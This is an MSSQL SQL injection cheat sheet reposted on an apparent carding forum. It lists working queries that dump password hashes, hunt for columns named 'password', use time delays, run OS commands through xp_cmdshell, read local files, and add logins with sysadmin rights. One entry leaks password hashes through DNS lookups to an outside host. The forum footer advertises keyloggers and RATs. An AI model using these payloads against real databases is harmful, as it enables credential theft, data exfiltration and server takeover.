code:

** some of the queries in the table below can only be run by an admin (sa privilege).
these are marked with "-- priv" at the end of the query. **

+---------------+---------------------------------------------------------------------------+
| version | select @@version |
|---------------|---------------------------------------------------------------------------|
| comments | select 1 -- comment |
| | select /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | select user_name(); |
| | select system_user; |
| current user | select user; |
| | select loginame from master..sysprocesses where spid = @@spid |
|---------------|---------------------------------------------------------------------------|
| list users | select name from master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | mssql2000: select name, password from master..sysxlogins -- priv |
| | |
| | select name, master.dbo.fn_varbintohexstr(password) |
| | from master..sysxlogins -- priv |
| list password | |
| hashes | mssql2005: select name, password_hash from |
| | master.sys.sql_logins -- priv |
| | |
| | select name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | from master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | select is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, null for invalid role. |
| | also try 'bulkadmin', 'systemadmin' and other values. |
| list dba | |
| accounts | |
| | select is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | return 1 for true, 0 for false, null for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| current db | select db_name() |
|---------------|---------------------------------------------------------------------------|
| list | select name from master..sysdatabases; |
| databases | select db_name(n); -- for n = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | select name from syscolumns where id = (select id from sysobjects where |
| | name = 'mytable'); -- for the current db only |
| | |
| list columns | select master..syscolumns.name, type_name(master..syscolumns.xtype) from |
| | master..syscolumns, master..sysobjects where |
| | master..syscolumns.id=master..sysobjects.id and |
| | master..sysobjects.name='sometable'; -- list colum names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | select name from master..sysobjects where xtype = 'u'; |
| | (use xtype = 'v' for views) |
| | select name from someotherdb..sysobjects where xtype = 'u'; |
| | |
| list tables | select master..syscolumns.name, type_name(master..syscolumns.xtype) |
| | from master..syscolumns, master..sysobjects where |
| | master..syscolumns.id=master..sysobjects.id and |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- nb: this example works only for the current database. |
| | if you wan't to search another db, you need to specify the db name |
| find tables | (e.g. replace sysobject with mydb..sysobjects). |
| from | |
| column name | select sysobjects.name as tablename, syscolumns.name as columnname |
| | from sysobjects join syscolumns on sysobjects.id = syscolumns.id |
| | where sysobjects.xtype = 'u' and syscolumns.name like '%password%' -- |
| | this lists table, column for each column containing the word 'password' |
|---------------|---------------------------------------------------------------------------|
| select | select top 1 name from (select top 9 name from master..syslogins |
| nth row | order by name asc) sq order by name desc -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|select nth char| select substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| bitwise and | select 6 & 2 -- returns 2 |
| | select 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ascii value | select char(0x41) -- returns a |
| -> char | |
|---------------|---------------------------------------------------------------------------|
| char -> ascii | select ascii('a') - returns 65 |
| value | |
|---------------|---------------------------------------------------------------------------|
| casting | select cast('1' as int); |
| | select cast(1 as char) |
|---------------|---------------------------------------------------------------------------|
| string | select 'a' + 'b' - returns ab |
| concatenation | |
|---------------|---------------------------------------------------------------------------|
| if statement | if (1=1) select 1 else select 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|case statement | select case when 1=1 then 1 else 2 end -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|avoiding quotes| select char(65)+char(66) -- returns ab |
|---------------|---------------------------------------------------------------------------|
| time delay | waitfor delay '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name from master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| dns requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- nb: concatenation is not allowed in calls to these sps, hence why we |
| | have to use @host. messy but necessary. |
| | -- also check out thedns tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| command | exec xp_cmdshell 'net user'; -- priv |
| execution | |
|---------------|---------------------------------------------------------------------------|
| local | create table mydata (line varchar(8000)); |
| file access | bulk insert mydata from 'c:\boot.ini'; |
| | drop table mydata; |
|---------------|---------------------------------------------------------------------------|
| hostname, ip | select host_name() |
|---------------|---------------------------------------------------------------------------|
| create users | exec sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| drop users | exec sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| make user dba | exec master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
+---------------+---------------------------------------------------------------------------+
share
| like
b13-u likes this.
settingup keyloggers rats
phpmailer
shop scripts
request for tutorial send me a pm

:::::::: cardingmafia.ws ::::::